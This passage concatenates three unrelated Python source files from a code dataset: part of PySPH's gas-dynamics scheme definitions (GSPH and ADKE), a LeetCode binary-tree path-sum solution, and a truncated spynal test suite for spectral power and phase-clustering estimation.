            help="Use the hybrid scheme.",
            default=None
        )

    def consume_user_options(self, options):
        """Copy parsed options onto the scheme; string-valued choices are
        mapped to their integer codes via ``_smart_getattr_mapped``."""
        vars = ['gamma', 'g1', 'g2', 'interface_zero',
                'hybrid', 'blend_alpha']
        data = dict((var, self._smart_getattr(options, var))
                    for var in vars)
        map_vars = ['monotonicity', 'rsolver', 'interpolation']
        for var in map_vars:
            data[var] = self._smart_getattr_mapped(options, var)
        self.configure(**data)

    def _smart_getattr_mapped(self, obj, var):
        """Return the integer code for option `var`: the current attribute
        when the option is unset, else the value from `<var>_choices`."""
        res = getattr(obj, var)
        if res is None:
            return getattr(self, var)
        else:
            choices = getattr(self, f'{var}_choices')
            return choices[res]

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        """Configure the solver to be generated.

        Parameters
        ----------
        kernel : Kernel instance.
            Kernel to use, if none is passed a default one is used.
        integrator_cls : pysph.sph.integrator.Integrator
            Integrator class to use, use sensible default if none is
            passed.
        extra_steppers : dict
            Additional integration stepper instances as a dict.
        **kw : extra arguments
            Any additional keyword args are passed to the solver instance.
        """
        from pysph.base.kernels import Gaussian
        if kernel is None:
            kernel = Gaussian(dim=self.dim)
        steppers = {}
        if extra_steppers is not None:
            steppers.update(extra_steppers)
        from pysph.sph.integrator import EulerIntegrator
        from pysph.sph.integrator_step import GSPHStep
        cls = integrator_cls if integrator_cls is not None else EulerIntegrator
        step_cls = GSPHStep
        for name in self.fluids:
            if name not in steppers:
                steppers[name] = step_cls()
        integrator = cls(**steppers)
        from pysph.solver.solver import Solver
        self.solver = Solver(
            dim=self.dim, integrator=integrator, kernel=kernel, **kw
        )
        # Keep the final time in sync for the hybrid-scheme blending.
        if 'tf' in kw:
            self.tf = kw['tf']

    def get_equations(self):
        """Return the equation Groups: adaptive-h/density steps interleaved
        with wall boundaries, then EOS, gradients, optional ghost updates
        and the GSPH accelerations. Group order matters."""
        from pysph.sph.equation import Group
        from pysph.sph.gas_dynamics.basic import (
            ScaleSmoothingLength, UpdateSmoothingLengthFromVolume,
            SummationDensity, IdealGasEOS
        )
        from pysph.sph.gas_dynamics.boundary_equations import WallBoundary
        from pysph.sph.gas_dynamics.gsph import (
            GSPHGradients, GSPHAcceleration, GSPHUpdateGhostProps
        )
        equations = []
        # Find the optimal 'h'
        group = []
        for fluid in self.fluids:
            group.append(
                ScaleSmoothingLength(dest=fluid, sources=None, factor=2.0)
            )
        equations.append(Group(equations=group, update_nnps=True))
        # Wall boundaries are re-applied after each step that changes the
        # fluid state so the solids stay consistent.
        if self.solids:
            group = []
            for solid in self.solids:
                group.append(WallBoundary(solid, sources=self.fluids))
            equations.append(Group(equations=group))
        all_pa = self.fluids + self.solids
        group = []
        for fluid in self.fluids:
            group.append(
                SummationDensity(
                    dest=fluid, sources=all_pa, dim=self.dim
                )
            )
        equations.append(Group(equations=group, update_nnps=False))
        if self.solids:
            group = []
            for solid in self.solids:
                group.append(WallBoundary(solid, sources=self.fluids))
            equations.append(Group(equations=group))
        group = []
        for fluid in self.fluids:
            group.append(
                UpdateSmoothingLengthFromVolume(
                    dest=fluid, sources=None, k=self.kernel_factor,
                    dim=self.dim
                )
            )
        equations.append(Group(equations=group, update_nnps=True))
        group = []
        for fluid in self.fluids:
            group.append(
                SummationDensity(
                    dest=fluid, sources=all_pa, dim=self.dim
                )
            )
        equations.append(Group(equations=group, update_nnps=False))
        # Done with finding the optimal 'h'
        group = []
        for fluid in self.fluids:
            group.append(IdealGasEOS(dest=fluid, sources=None,
                                     gamma=self.gamma))
        equations.append(Group(equations=group))
        if self.solids:
            group = []
            for solid in self.solids:
                group.append(WallBoundary(solid, sources=self.fluids))
            equations.append(Group(equations=group))
        g2 = []
        for fluid in self.fluids:
            g2.append(GSPHGradients(dest=fluid, sources=all_pa))
        equations.append(Group(equations=g2))
        if self.has_ghosts:
            # Propagate updated properties to ghost particles before the
            # acceleration computation.
            g3 = []
            for fluid in self.fluids:
                g3.append(GSPHUpdateGhostProps(dest=fluid, sources=None))
            equations.append(Group(
                equations=g3, update_nnps=False, real=False
            ))
        g4 = []
        for fluid in self.fluids:
            g4.append(GSPHAcceleration(
                dest=fluid, sources=all_pa, g1=self.g1,
                g2=self.g2, monotonicity=self.monotonicity,
                rsolver=self.rsolver, interpolation=self.interpolation,
                interface_zero=self.interface_zero,
                hybrid=self.hybrid, blend_alpha=self.blend_alpha,
                gamma=self.gamma, niter=self.niter, tol=self.tol
            ))
        equations.append(Group(equations=g4))
        return equations

    def setup_properties(self, particles, clean=True):
        """Add GSPH properties (incl. per-variable gradients) and output
        arrays to `particles`."""
        from pysph.base.utils import get_particle_array_gasd
        import numpy
        particle_arrays = dict([(p.name, p) for p in particles])
        # Template array plus the gradient components needed by GSPH.
        dummy = get_particle_array_gasd(name='junk')
        props = (list(dummy.properties.keys()) +
                 'px py pz ux uy uz vx vy vz wx wy wz'.split())
        output_props = dummy.output_property_arrays
        for fluid in self.fluids:
            pa = particle_arrays[fluid]
            self._ensure_properties(pa, props, clean)
            # orig_idx records each particle's original index so particles
            # can be tracked after sorting/load balancing.
            pa.add_property('orig_idx', type='int')
            nfp = pa.get_number_of_particles()
            pa.orig_idx[:] = numpy.arange(nfp)
            pa.set_output_arrays(output_props)
        # Solids additionally need the wall-boundary work arrays.
        solid_props = set(props) | set(('wij', 'htmp'))
        for solid in self.solids:
            pa = particle_arrays[solid]
            self._ensure_properties(pa, solid_props, clean)
            pa.set_output_arrays(output_props)
class ADKEScheme(Scheme):
    """Adaptive Density Kernel Estimation (ADKE) gas-dynamics scheme."""

    def __init__(self, fluids, solids, dim, gamma=1.4, alpha=1.0, beta=2.0,
                 k=1.0, eps=0.0, g1=0, g2=0, has_ghosts=False):
        """
        Parameters
        ----------

        fluids: list
            a list with names of fluid particle arrays
        solids: list
            a list with names of solid (or boundary) particle arrays
        dim: int
            dimensionality of the problem
        gamma: double
            Gamma for equation of state
        alpha: double
            artificial viscosity parameter
        beta: double
            artificial viscosity parameter
        k: double
            kernel scaling parameter
        eps: double
            kernel scaling parameter
        g1: double
            artificial heat conduction parameter
        g2: double
            artificial heat conduction parameter
        has_ghosts: bool
            if problem uses ghost particles (periodic or mirror)
        """
        self.fluids = fluids
        self.solids = solids
        self.dim = dim
        self.solver = None
        self.gamma = gamma
        self.alpha = alpha
        self.beta = beta
        self.k = k
        self.eps = eps
        self.g1 = g1
        self.g2 = g2
        self.has_ghosts = has_ghosts

    def get_equations(self):
        """Return the equation Groups: ADKE density estimation interleaved
        with wall boundaries, EOS, optional ghost updates, then the ADKE
        accelerations. Group order matters."""
        from pysph.sph.equation import Group
        from pysph.sph.basic_equations import SummationDensity
        from pysph.sph.gas_dynamics.basic import (
            IdealGasEOS, ADKEAccelerations, SummationDensityADKE,
            ADKEUpdateGhostProps
        )
        from pysph.sph.gas_dynamics.boundary_equations import WallBoundary
        equations = []
        # Wall boundaries are re-applied after each step that changes the
        # fluid state so the solids stay consistent.
        if self.solids:
            g1 = []
            for solid in self.solids:
                g1.append(WallBoundary(solid, sources=self.fluids))
            equations.append(Group(equations=g1))
        # ADKE pilot density estimate (sets the adaptive smoothing length).
        g2 = []
        for fluid in self.fluids:
            g2.append(
                SummationDensityADKE(
                    fluid, sources=self.fluids + self.solids, k=self.k,
                    eps=self.eps
                )
            )
        equations.append(Group(g2, update_nnps=False, iterate=False))
        if self.solids:
            g3 = []
            for solid in self.solids:
                g3.append(WallBoundary(solid, sources=self.fluids))
            equations.append(Group(equations=g3))
        # Final density with the adapted smoothing lengths.
        g4 = []
        for fluid in self.fluids:
            g4.append(SummationDensity(fluid, self.fluids+self.solids))
        equations.append(Group(g4, update_nnps=True))
        if self.solids:
            g5 = []
            for solid in self.solids:
                g5.append(WallBoundary(solid, sources=self.fluids))
            equations.append(Group(equations=g5))
        # Equation of state on fluids and solids alike.
        g6 = []
        for elem in self.fluids+self.solids:
            g6.append(IdealGasEOS(elem, sources=None, gamma=self.gamma))
        equations.append(Group(equations=g6))
        if self.has_ghosts:
            # Propagate updated properties to ghost particles before
            # computing accelerations.
            gh = []
            for fluid in self.fluids:
                gh.append(
                    ADKEUpdateGhostProps(dest=fluid, sources=None)
                )
            equations.append(Group(equations=gh, real=False))
        g7 = []
        for fluid in self.fluids:
            g7.append(
                ADKEAccelerations(
                    dest=fluid, sources=self.fluids + self.solids,
                    alpha=self.alpha, beta=self.beta, g1=self.g1, g2=self.g2,
                    k=self.k, eps=self.eps
                )
            )
        equations.append(Group(equations=g7))
        return equations

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        """Configure the solver to be generated.

        Parameters
        ----------
        kernel : Kernel instance.
            Kernel to use, if none is passed a default one is used.
        integrator_cls : pysph.sph.integrator.Integrator
            Integrator class to use, use sensible default if none is
            passed.
        extra_steppers : dict
            Additional integration stepper instances as a dict.
        **kw : extra arguments
            Any additional keyword args are passed to the solver instance.
        """
        from pysph.base.kernels import Gaussian
        if kernel is None:
            kernel = Gaussian(dim=self.dim)
        steppers = {}
        if extra_steppers is not None:
            steppers.update(extra_steppers)
        from pysph.sph.integrator import PECIntegrator
        from pysph.sph.integrator_step import ADKEStep
        cls = integrator_cls if integrator_cls is not None else PECIntegrator
        step_cls = ADKEStep
        for name in self.fluids:
            if name not in steppers:
                steppers[name] = step_cls()
        integrator = cls(**steppers)
        from pysph.solver.solver import Solver
        self.solver = Solver(
            dim=self.dim, integrator=integrator, kernel=kernel, **kw
        )

    def setup_properties(self, particles, clean=True):
        """Add ADKE properties and output arrays to `particles`."""
        from pysph.base.utils import get_particle_array
        import numpy
        particle_arrays = dict([(p.name, p) for p in particles])
        # NOTE(review): 'h0' appears twice in this list — harmless
        # duplicate, but presumably one entry was meant to be something
        # else; confirm against the ADKE equations.
        required_props = [
            'x', 'y', 'z', 'u', 'v', 'w', 'rho', 'h', 'm', 'cs', 'p',
            'e', 'au', 'av', 'aw', 'arho', 'ae', 'am', 'ah', 'x0', 'y0',
            'z0', 'u0', 'v0', 'w0', 'rho0', 'e0', 'h0', 'div', 'h0',
            'wij', 'htmp', 'logrho']
        dummy = get_particle_array(additional_props=required_props,
                                   name='junk')
        dummy.set_output_arrays(
            ['x', 'y', 'u', 'v', 'rho', 'm', 'h',
             'cs', 'p', 'e', 'au', 'av', 'ae', 'pid', 'gid', 'tag']
        )
        props = list(dummy.properties.keys())
        output_props = dummy.output_property_arrays
        for solid in self.solids:
            pa = particle_arrays[solid]
            self._ensure_properties(pa, props, clean)
            pa.set_output_arrays(output_props)
        for fluid in self.fluids:
            pa = particle_arrays[fluid]
            self._ensure_properties(pa, props, clean)
            # orig_idx records each particle's original index so particles
            # can be tracked after sorting/load balancing.
            pa.add_property('orig_idx', type='int')
            nfp = pa.get_number_of_particles()
            pa.orig_idx[:] = numpy.arange(nfp)
            pa.set_output_arrays(output_props)
| pypr/pysph | pysph/sph/scheme.py | scheme.py | py | 58,703 | python | en | code | 390 | github-code | 90 |
25251083629 | # coding: utf8
"""
---------------------------------------------
File Name: 112-path-sum
Description:
Author: wangdawei
date: 2018/4/25
---------------------------------------------
Change Activity:
2018/4/25
---------------------------------------------
"""
# Definition for a binary tree node.
class TreeNode:
    """A binary-tree node holding a value and two (initially empty) children."""

    def __init__(self, x):
        self.val = x
        self.left = self.right = None
import collections
# bfs iterate
class Solution:
    """BFS-based solutions: rebuild a tree from traversals, and decide
    whether a root-to-leaf path sums to a target (two BFS variants)."""

    def buildTree(self, preorder, inorder):
        """Rebuild the binary tree from its preorder and inorder traversals.

        :type preorder: List[int]
        :type inorder: List[int]
        :rtype: TreeNode
        """
        if not preorder and not inorder:
            return None
        if len(preorder) == 1 and len(inorder) == 1:
            return TreeNode(preorder[0])
        root_val = preorder[0]
        node = TreeNode(root_val)
        # Everything left of root_val in `inorder` belongs to the left subtree.
        split = inorder.index(root_val)
        node.left = self.buildTree(preorder[1:1 + split], inorder[:split])
        node.right = self.buildTree(preorder[split + 1:], inorder[split + 1:])
        return node

    def hasPathSumLevelone(self, root, sum):
        """Level-by-level BFS carrying (node, running-sum) pairs.

        :type root: TreeNode
        :rtype: bool
        """
        if not root:
            return False
        frontier = [(root, root.val)]
        while frontier:
            nxt = []
            for node, running in frontier:
                # A hit only counts at a leaf.
                if node.left is None and node.right is None and running == sum:
                    return True
                if node.left:
                    nxt.append((node.left, running + node.left.val))
                if node.right:
                    nxt.append((node.right, running + node.right.val))
            frontier = nxt
        return False

    def hasPathSum(self, root, sum):
        """BFS with a deque of (node, running-sum) pairs.

        :type root: TreeNode
        :rtype: bool
        """
        if not root:
            return False
        pending = collections.deque([(root, root.val)])
        while pending:
            node, running = pending.popleft()
            if node.left is None and node.right is None and running == sum:
                return True
            if node.left:
                pending.append((node.left, running + node.left.val))
            if node.right:
                pending.append((node.right, running + node.right.val))
        return False
# dfs iterate
class Solution:
    """DFS-based solutions (deliberately shadows the BFS variant above):
    rebuild a tree from traversals, and decide whether a root-to-leaf
    path sums to a target."""

    def buildTree(self, preorder, inorder):
        """Rebuild the binary tree from its preorder and inorder traversals.

        :type preorder: List[int]
        :type inorder: List[int]
        :rtype: TreeNode
        """
        if not preorder and not inorder:
            return None
        if len(preorder) == 1 and len(inorder) == 1:
            return TreeNode(preorder[0])
        root_val = preorder[0]
        node = TreeNode(root_val)
        # Everything left of root_val in `inorder` belongs to the left subtree.
        split = inorder.index(root_val)
        node.left = self.buildTree(preorder[1:1 + split], inorder[:split])
        node.right = self.buildTree(preorder[split + 1:], inorder[split + 1:])
        return node

    def hasPathSum(self, root, sum):
        """Recursive DFS: subtract node values from the target on the way
        down; a path exists iff some leaf leaves a remainder of zero."""
        if not root:
            return False
        remainder = sum - root.val
        if root.left is None and root.right is None:
            return remainder == 0
        return (self.hasPathSum(root.left, remainder) or
                self.hasPathSum(root.right, remainder))
# Quick manual check of hasPathSum on the classic example tree
#       3
#      / \
#     9  20
#        / \
#       15  7
solu = Solution()
root2 = TreeNode(3)
root2.left = TreeNode(9)
root2.right = TreeNode(20)
root2.right.left = TreeNode(15)
root2.right.right = TreeNode(7)
# Path sums are 12 (3+9), 38 (3+20+15) and 30 (3+20+7); 37 has no path.
for target in (12, 30, 38, 37):
    print("#"*30)
    print(solu.hasPathSum(root2, target))
21716735512 | """
Suite of tests to assess "face validity" of spectral analysis functions in spectra.py
Usually used to test new or majorly updated functions.
Includes tests that parametrically estimate power as a function of frequency, amplitude, phase,
n, etc. to establish methods produce expected pattern of results.
Plots results and runs assertions that basic expected results are reproduced
Functions
---------
- test_power : Contains tests of spectral estimation functions
- power_test_battery : Runs standard battery of tests of spectral estimation functions
- itpc_test_battery : Runs standard battery of tests of ITPC estimation functions
"""
import os
import time
from warnings import warn
from math import pi, sqrt, ceil, floor, log2
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import bernoulli
from spynal.spectra.spectra import power_spectrogram, itpc
from spynal.spectra.utils import simulate_oscillation
def test_power(method, test='frequency', test_values=None, spec_type='power',
do_tests=True, do_plots=False, plot_dir=None, seed=1,
amp=5.0, freq=32, phi=0, phi_sd=0, noise=0.5, n=1000, burst_rate=0,
time_range=3.0, smp_rate=1000, spikes=False, **kwargs):
"""
Basic testing for functions estimating time-frequency spectral power
Generate synthetic LFP data using given network simulation,
estimate spectrogram using given function, and compares estimated to expected.
For test failures, raises an error or warning (depending on value of `do_tests`).
Optionally plots summary of test results.
Parameters
----------
method : str
Name of time-frequency spectral estimation function to test. Options:
'wavelet' | 'multitaper' | 'bandfilter' | 'burst'
test : str, default: 'frequency'
Type of test to run. Options:
- 'frequency' : Tests multiple simulated oscillatory frequencies
Checks power for monotonic increase of peak freq
- 'amplitude' : Tests multiple simulated amplitudes at same freq
Checks power for monotonic increase of amplitude
- 'phase_sd': Tests multiple simulated phase std dev's (ie evoked vs induced)
Checks that power doesn't greatly vary with phase SD.
Checks that ITPC decreases monotonically with phase SD
- 'n' : Tests multiple values of number of trials (n)
Checks that power doesn't greatly vary with n.
- 'burst_rate' : Checks that oscillatory burst rate increases
as it's increased in simulated data.
test_values : array-like, shape=(n_values,), dtype=str
List of values to test. Interpretation and defaults are test-specific:
- 'frequency' : List of frequencies to test. Default: [4,8,16,32,64]
- 'amplitude' : List of oscillation amplitudes to test. Default: [1,2,5,10,20]
- 'n' : Trial numbers. Default: [25,50,100,200,400,800]
spec_type : str, default: 'power'
Type of spectral signal to return. Options: 'power' | 'itpc' (intertrial phase clustering)
do_tests : bool, default: True
Set=True to evaluate test results against expected values and raise an error if they fail
do_plots : bool, default: False
Set=True to plot test results
plot_dir : str, default: None (don't save to file)
Full-path directory to save plots to. Set=None to not save plots.
seed : int, default: 1 (reproducible random numbers)
Random generator seed for repeatable results. Set=None for fully random numbers.
- Following args set param's for sim, may be overridden by <test_values> depending on test -
amp Scalar. Simulated oscillation amplitude (a.u.) if test != 'amplitude'. Default: 5.0
freq Scalar. Simulated oscillation frequency (Hz) if test != 'frequency'. Default: 32
phi Scalar. Simulated oscillation (mean) phase (rad). Default: 0
phi_sd Scalar. Simulated oscillation phase std dev (rad). Default: 0
noise Scalar. Additive noise for simulated signal (a.u., same as amp). Default: 0.5
n Int. Number of trials to simulate if test != 'n'. Default: 1000
burst_rate Scalar. Oscillatory burst rate (bursts/trial). Default: 0 (non-bursty)
time_range Scalar. Full time range to simulate oscillation over (s). Default: 1.0
smp_rate Int. Sampling rate for simulated data (Hz). Default: 1000
**kwargs :
All other keyword args passed to spectral estimation function
Returns
-------
means : ndarray, shape=(n_freqs,n_timepts,n_values)
Estimated mean spectrogram for each tested value.
sems : ndarray, shape=(n_freqs,n_timepts,n_values)
SEM of mean spectrogram for each tested value.
passed : bool
True if all tests produce expected values; otherwise False.
"""
method = method.lower()
test = test.lower()
spec_type = spec_type.lower()
# Set defaults for tested values and set up rate generator function depending on <test>
sim_args = dict(amplitude=amp, phase=phi, phase_sd=phi_sd,
n_trials=n, noise=noise, time_range=time_range, burst_rate=burst_rate,
seed=seed)
if test in ['frequency','freq']:
test_values = [4,8,16,32,64] if test_values is None else test_values
gen_data = lambda freq: simulate_oscillation(freq,**sim_args)
elif test in ['amplitude','amp']:
test_values = [1,2,5,10,20] if test_values is None else test_values
del sim_args['amplitude'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda amp: simulate_oscillation(freq,**sim_args,amplitude=amp)
elif test in ['phase','phi']:
test_values = [-pi,-pi/2,0,pi/2,pi] if test_values is None else test_values
del sim_args['phase'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda phi: simulate_oscillation(freq,**sim_args,phase=phi)
elif test in ['phase_sd','phi_sd']:
test_values = [pi, pi/2, pi/4, 0] if test_values is None else test_values
del sim_args['phase_sd'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda phi_sd: simulate_oscillation(freq,**sim_args,phase_sd=phi_sd)
elif test in ['n','n_trials']:
test_values = [25,50,100,200,400,800] if test_values is None else test_values
del sim_args['n_trials'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda n: simulate_oscillation(freq,**sim_args,n_trials=n)
elif test in ['burst_rate','burst']:
test_values = [0.1,0.2,0.4,0.8] if test_values is None else test_values
del sim_args['burst_rate'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda rate: simulate_oscillation(freq,**sim_args,burst_rate=rate)
else:
raise ValueError("Unsupported value '%s' set for <test>" % test)
# Ensure hand-set values are sorted (ascending), as many tests assume it
test_values = sorted(test_values)
n_values = len(test_values)
# Set default parameters for each spectral estimation method
do_burst = method in ['burst','burst_analysis']
do_itpc = spec_type == 'itpc'
# Special case: oscillatory burst analysis
if do_burst:
# KLUDGE Reset spectral analysis <method> to 'wavelet' (unless set explicitly in kwargs)
if 'bands' not in kwargs: kwargs['bands'] = ((2,6),(6,10),(10,22),(22,42),(42,86))
elif method == 'multitaper':
if 'freq_range' not in kwargs: kwargs['freq_range'] = [1,100]
elif method == 'bandfilter':
if 'freqs' not in kwargs: kwargs['freqs'] = ((2,6),(6,10),(10,22),(22,42),(42,86))
if ('buffer' not in kwargs) and (method != 'multitaper'): kwargs['buffer'] = 1.0
if do_itpc:
if 'itpc_method' not in kwargs: kwargs['itpc_method'] = 'PLV'
kwargs['trial_axis'] = 1
spec_fun = itpc if do_itpc else power_spectrogram
for i,value in enumerate(test_values):
# print("Running test value %d/%d: %.2f" % (i+1,n_values,value))
# Simulate data with oscillation of given params -> (n_timepts,n_trials)
data = gen_data(value)
# HACK Convert continuous oscillatory data into spike train (todo find better method)
if spikes:
data = (data - data.min()) / data.ptp() # Convert to 0-1 range ~ spike probability
data = data**2 # Sparsify probabilies (decrease rates)
# Use probabilities to generate Bernoulli random variable at each time point
data = bernoulli.ppf(0.5, data).astype(bool)
spec,freqs,timepts = spec_fun(data,smp_rate,axis=0,method=method,**kwargs)
if freqs.ndim == 2:
bands = freqs
freqs = freqs.mean(axis=1) # Compute center of freq bands
if do_itpc: n_freqs,n_timepts = spec.shape
else: n_freqs,n_timepts,n_trials = spec.shape
# KLUDGE Initialize output arrays on 1st loop, once spectrogram output shape is known
if i == 0:
means = np.empty((n_freqs,n_timepts,n_values))
sems = np.empty((n_freqs,n_timepts,n_values))
# Compute across-trial mean and SEM of time-frequency data -> (n_freqs,n_timepts,n_values)
if not do_itpc:
means[:,:,i] = spec.mean(axis=2)
sems[:,:,i] = spec.std(axis=2,ddof=0) / sqrt(n_trials)
# HACK ITPC by definition already reduced across trials, so just copy results into "means"
else:
means[:,:,i] = spec
sems[:,:,i] = 0
# Compute mean across all timepoints -> (n_freqs,n_values) frequency marginal
marginal_means = means.mean(axis=1)
marginal_sems = sems.mean(axis=1)
# For bandfilter, plot frequency bands in categorical fashion
if do_burst or (method == 'bandfilter'):
freq_transform = lambda x: np.argmin(np.abs(x - freqs)) # Index of closest sampled freq
plot_freqs = np.arange(n_freqs)
freq_ticks = np.arange(n_freqs)
freq_tick_labels= bands
# For wavelets, evaluate and plot frequency on log scale
elif method == 'wavelet':
freq_transform = np.log2
plot_freqs = freq_transform(freqs)
fmin = ceil(log2(freqs[0]))
fmax = floor(log2(freqs[-1]))
freq_ticks = np.arange(fmin,fmax+1)
freq_tick_labels= 2**np.arange(fmin,fmax+1)
# For multitaper, evaluate and plot frequency on linear scale
elif method == 'multitaper':
freq_transform = lambda x: x
plot_freqs = freqs
fmin = ceil(freqs[0]/10.0)*10.0
fmax = floor(freqs[-1]/10.0)*10.0
freq_ticks = np.arange(fmin,fmax+1,10).astype(int)
freq_tick_labels= freq_ticks
freqs_transformed = np.asarray([freq_transform(f) for f in freqs])
# For frequency test, find frequency with maximal power for each test
if test in ['frequency','freq']:
idxs = np.argmax(marginal_means,axis=0)
peak_freqs = freqs[idxs] if not(do_burst or (method == 'bandfilter')) else idxs
# Find frequency in spectrogram closest to each simulated frequency
test_freq_idxs = np.asarray([np.argmin(np.abs(freq_transform(f) - freqs_transformed))
for f in test_values])
# Extract mean,SEM of power at each tested frequency
test_freq_means = marginal_means[test_freq_idxs,np.arange(n_values)]
test_freq_errs = marginal_sems[test_freq_idxs,np.arange(n_values)]
else:
# Find frequency in spectrogram closest to simulated frequency
test_freq_idx = np.argmin(np.abs(freq_transform(freq) - freqs_transformed))
# Extract mean,SEM of power at tested frequency
test_freq_means = marginal_means[test_freq_idx,:]
test_freq_errs = marginal_sems[test_freq_idx,:]
# Plot summary of test results
if do_plots:
dt = np.diff(timepts).mean()
tlim = [timepts[0]-dt/2, timepts[-1]+dt/2]
df = np.diff(plot_freqs).mean()
flim = [plot_freqs[0]-df/2, plot_freqs[-1]+df/2]
# # Plot spectrogram for each tested value
# plt.figure()
# n_subplots = [floor(n_values/2), ceil(n_values/floor(n_values/2))]
# for i,value in enumerate(test_values):
# ax = plt.subplot(n_subplots[0],n_subplots[1],i+1)
# plt.grid(axis='both',color=[0.75,0.75,0.75],linestyle=':')
# target_freq = freq_transform(value) if test in ['frequency','freq'] else \
# freq_transform(freq)
# if not (do_burst or (method == 'bandfilter')):
# plt.plot(tlim, [target_freq,target_freq], '-', color='r', linewidth=0.5)
# plt.imshow(means[:,:,i], extent=[*tlim,*flim], aspect='auto', origin='lower')
# if i in [0,n_subplots[1]]:
# plt.yticks(freq_ticks,freq_tick_labels)
# else:
# ax.set_xticklabels([])
# plt.yticks(freq_ticks,[])
# plt.title(np.round(value,decimals=2))
# plt.colorbar()
# plt.show()
# if plot_dir is not None:
# filename = 'power-spectrogram-%s-%s-%s.png' % (kwargs['itpc_method'],method,test) \
# if do_itpc else 'power-spectrogram-%s-%s.png' % (method,test)
# plt.savefig(os.path.join(plot_dir,filename))
# Plot time-averaged spectrum for each tested value
plt.figure()
colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
ylim = [0,1.05*marginal_means.max()]
for i,value in enumerate(test_values):
plt.plot(plot_freqs, marginal_means[:,i], '.-', color=colors[i], linewidth=1.5)
target_freq = freq_transform(value) if test in ['frequency','freq'] else \
freq_transform(freq)
if not (do_burst or (method == 'bandfilter')):
plt.plot([target_freq,target_freq], ylim, '-', color=colors[i], linewidth=0.5)
plt.text(0.9*flim[1], (0.95-i*0.05)*ylim[1], value, color=colors[i], fontweight='bold')
plt.xlim(flim)
plt.ylim(ylim)
plt.xticks(freq_ticks,freq_tick_labels)
plt.grid(axis='both',color=[0.75,0.75,0.75],linestyle=':')
plt.xlabel('Frequency (Hz)')
plt.ylabel(spec_type)
plt.title("%s %s test" % (method,test))
plt.show()
if plot_dir is not None:
filename = 'power-spectrum-%s-%s-%s.png' % (kwargs['itpc_method'],method,test) \
if do_itpc else 'power-spectrum-%s-%s.png' % (method,test)
plt.savefig(os.path.join(plot_dir,filename))
# Plot summary curve of power (or peak frequency) vs tested value
plt.figure()
ax = plt.subplot(1,1,1)
plt.grid(axis='both',color=[0.75,0.75,0.75],linestyle=':')
if test in ['frequency','freq']:
lim = (0,1.1*freq_transform(test_values[-1]))
plt.plot(lim, lim, color='k', linewidth=0.5)
if do_burst or (method == 'bandfilter'):
plt.plot([freq_transform(f) for f in test_values], peak_freqs, marker='o')
else:
plt.plot([freq_transform(f) for f in test_values],
[freq_transform(f) for f in peak_freqs], marker='o')
plt.xticks(freq_ticks,freq_tick_labels)
plt.yticks(freq_ticks,freq_tick_labels)
plt.xlim(lim)
plt.ylim(lim)
ax.set_aspect('equal', 'box')
else:
plt.errorbar(test_values, test_freq_means, 3*test_freq_errs, marker='o')
plt.xlabel(test)
plt.ylabel('frequency' if test in ['frequency','freq'] else spec_type)
plt.title("%s %s test" % (method,test))
plt.show()
if plot_dir is not None:
filename = 'power-summary-%s-%s-%s.png' % (kwargs['itpc_method'],method,test) \
if do_itpc else 'power-summary-%s-%s.png' % (method,test)
plt.savefig(os.path.join(plot_dir,filename))
## Determine if test actually produced the expected values
# frequency test: check if frequency of peak power matches simulated target frequency
if test in ['frequency','freq']:
evals = [((np.diff(peak_freqs) >= 0).all(),
"Estimated peak freq does not increase monotonically with expected freq")]
# 'amplitude' : Test if power increases monotonically with simulated amplitude
elif test in ['amplitude','amp']:
if spec_type == 'power':
evals = [((np.diff(test_freq_means) > 0).all(),
"Estimated power doesn't increase monotonically with simulated amplitude")]
else:
evals = {}
# 'phase' : Test if power is ~ constant across phase
elif test in ['phase','phi']:
crit = 0.2 if do_itpc else test_freq_errs.max()
evals = [(test_freq_means.ptp() < crit,
"Estimated %s has larger than expected range across different simulated phases"
% spec_type)]
# 'phase_sd' : Test if power is ~ constant across phase SD;
# Test if ITPC decreases monotonically with it
elif test in ['phase_sd','phi_sd']:
if do_itpc:
evals = [((np.diff(test_freq_means) < 0).all(),
"Estimated ITPC does not decrease monotonically with simulated phase SD")]
else:
evals = [(test_freq_means.ptp() < test_freq_errs.max(),
"Estimated %s has larger than expected range across simulated phase SDs"
% spec_type)]
# 'n' : Test if power is ~ same for all values of n (unbiased by n)
elif test in ['n','n_trials']:
crit = 0.2 if do_itpc else test_freq_errs.max()
evals = [(test_freq_means.ptp() < crit,
"Estimated %s has larger than expected range across n's (likely biased by n)"
% spec_type)]
# 'burst_rate': Test if measured burst rate increases monotonically with simulated burst rate
elif test in ['burst_rate','burst']:
evals = [((np.diff(test_freq_means) > 0).all(),
"Estimated burst rate does not increase monotonic with simulated burst rate")]
passed = True
for cond,message in evals:
if not cond: passed = False
# Raise an error for test fails if do_tests is True
if do_tests: assert cond, AssertionError(message)
# Just issue a warning for test fails if do_tests is False
elif not cond: warn(message)
return means, sems, passed
def power_test_battery(methods=('wavelet','multitaper','bandfilter'),
                       tests=('frequency','amplitude','phase','phase_sd','n','burst_rate'),
                       do_tests=True, **kwargs):
    """
    Run a battery of given tests on given oscillatory power computation methods

    Parameters
    ----------
    methods : array-like of str, default: ('wavelet','multitaper','bandfilter') (all supported)
        List of power computation methods to test.

    tests : array-like of str, default: ('frequency','amplitude','phase','phase_sd','n','burst_rate')
        List of tests to run.

    do_tests : bool, default: True
        Set=True to evaluate test results against expected values and raise an error if they fail.

    **kwargs :
        Any other keyword args passed directly to test_power()
    """
    if isinstance(methods,str): methods = [methods]
    if isinstance(tests,str): tests = [tests]

    for test in tests:
        for method in methods:
            print("Running %s test on %s spectral analysis" % (test,method))
            # BUGFIX: copy kwargs -- the old `extra_args = kwargs` aliased the dict,
            # so the burst-specific default below leaked into later methods/tests
            extra_args = dict(kwargs)
            if (method in ['burst','burst_analysis']) and ('burst_rate' not in extra_args):
                extra_args['burst_rate'] = 0.4  # Set nonzero burst rate for burst analysis

            t1 = time.time()
            _,_,passed = test_power(method, test=test, do_tests=do_tests, **extra_args)
            print('%s (test ran in %.1f s)' % ('PASSED' if passed else 'FAILED', time.time()-t1))

            # If saving plots to file, let's not leave them all open
